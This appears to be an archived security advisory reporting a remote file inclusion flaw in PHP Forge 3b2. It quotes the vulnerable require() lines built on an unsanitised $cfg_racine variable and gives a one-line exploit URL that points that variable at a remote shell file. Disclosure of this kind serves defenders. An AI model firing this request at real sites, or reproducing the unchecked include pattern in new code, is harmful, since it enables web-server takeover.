PHP Forge 3b2 suffers from a remote file inclusion vulnerability in inc.php.
ccdf758804c073ef26ea4456845129299445bdbe187e80e5f9b476b1a83c2f69PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
############
Source Code:
http://www.comscripts.com/jump.php?action=script&id=697
############
Vulnerable Code:_
require($cfg_racine."inc/vars.php");
require($cfg_racine."inc/config.php");
require($cfg_racine."inc/fonctions.php");
require($cfg_racine."inc/systeme.php");
require($cfg_racine."inc/mysql.php");
require($cfg_racine."inc/membres.php");
############
Exploit :
http://www.test.com/[Php_Forge]//inc/inc.php?cfg_racine=shell.txt?
############
Discoverd By : Mahmood_ali
Conatact : mah_k_2000@hotmail.com
############
Special Greetings :_ Tryag-Team
############
bugtraq@securityfocus.com
submit@milw0rm.com
_________________________________________________________________
The new Windows Live Toolbar helps you guard against viruses
http://toolbar.live.com/?mkt=en-gb
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed